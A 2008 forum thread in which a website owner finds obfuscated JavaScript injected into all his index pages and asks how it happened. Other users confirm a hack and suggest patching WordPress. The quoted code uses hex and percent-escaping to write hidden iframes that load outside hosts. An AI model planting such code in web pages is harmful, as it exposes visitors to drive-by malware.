Odd Javascript/Index Problem

Discussion in 'The Living Room' started by Kæton, Jun 3, 2008.

  1. #1
    Kæton

    Kæton is Keaton LPA Über VIP

    Joined:
    Oct 16, 2002
    Messages:
    10,388
    Likes Received:
    9



    I noticed my site was doing a lot of javascript loading for some odd reason and after looking at the source code, it seems the index pages for all directories in my domain had been updated with this javascript crap inside it. I'm curious to know how this happened and how I may prevent it from happening again.

    It seems to have something to do with traffic. I think some ass clown out there thought they'd get a lot of hits by somehow redirecting crap from my pages thinking I wouldn't catch on.

    Here's a rundown of some shady business I've seen lately:
    - A lot of sites with no relation to content on my site are somehow linking to me (according to stats).

    - The javascript continuously refreshing or something to multiple different URLs though the page remains the same.

    - According to my FTP, every index page (php/html extension) was updated on May 17th, presumably with this code inserted.

    I'm going to contact my host to see if there was any activity on that date that could help me understand the situation but I doubt it'll be very helpful. I'd like to know if there's some technique out there doing this that I can look out for or if I really was hacked.

    I've already changed my passwords and manually uploaded the original files for the most "popular" directory indexes on my site but I'd like to know if there's anything else I can do to prevent this because it's a pain in the ass to resolve.


    Thanks. :)


    edit: This is the code being inserted into the pages. It only seems to work on .html extensions because my index.php pages don't seem to react to the script.

    Code:
    function v482f6fc75b53f(v482f6fc75b925){  return(parseInt(v482f6fc75b925,16));}function v482f6fc75c4dd(v482f6fc75c8c6){  var v482f6fc75ccad='';for(v482f6fc75d095=0; v482f6fc75d095<v482f6fc75c8c6.length; v482f6fc75d095+=2){ v482f6fc75ccad+=(String.fromCharCode(v482f6fc75b53f(v482f6fc75c8c6.substr(v482f6fc75d095, 2))));}return v482f6fc75ccad;} document.write(v482f6fc75c4dd('3C696672616D65206E616D653D273035303027207372633D27687474703A2F2F626573746D6173746572732E636E2F7570646174652E706870272077696474683D343137206865696768743D343736207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
     
    !--
    var d=document;
    eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%65%64%2d%63%61%76%69%61%72%2d%6b%61%6d%63%68%61%74%6b%61%2e%63%6f%6d%2f%73%70%6c%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%37%36%33%38%29%2b%27%63%34%5c%27%20%77%69%64%74%68%3d%35%39%38%20%68%65%69%67%68%74%3d%34%38%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c3883382584;
    //--
    edit 2:
    I decrypted the second part of the code and it's definitely a script loading an iframe and hiding itself using a display command.
     
  2. #2
    Tomi

    Tomi &nbsp; LPA Addict

    Joined:
    Mar 10, 2004
    Messages:
    16,514
    Likes Received:
    51



    Ah, I've seen that before. You've indeed been hacked. Change your passwords, and look for anything exploitable.
     
  3. #3
    Kæton

    Kæton is Keaton LPA Über VIP

    Joined:
    Oct 16, 2002
    Messages:
    10,388
    Likes Received:
    9



    I was afraid of that but at the same time I find this to be absolutely hilarious. That means someone actually thought it'd be a good idea to hack my site (of all sites?), grab those files, took the time to edit them all and re-upload them. Now all I had to do is replace them with the originals and it's back to normal. That really doesn't make any sense and boy makes me feel bad for that poor sap... The guy huddled over his computer with some Red Bull and Cheetos all night... :lol:

    Anyways, thanks for the help Tomi. Are there any exploits that these “hackers” use that are often overlooked by the common folk that I could look into securing? :D The only thing I really use nowadays is Wordpress.
     
  4. #4
    Tomi

    Tomi &nbsp; LPA Addict

    Joined:
    Mar 10, 2004
    Messages:
    16,514
    Likes Received:
    51



    I doubt anyone personally did it. Probably a script or something that did it.

    Wordpress may have had an exploit. Make sure you're up to date. I know when I last saw this, it was on an IPB board. Something was exploited, which gave access to the admin cp and then that code was inserted into the wrapper.

    I find the whole escaped code idea amusing, as most people wouldn't have ever thought of checking for that, just code for an iframe. *chuckle*
     

Share This Page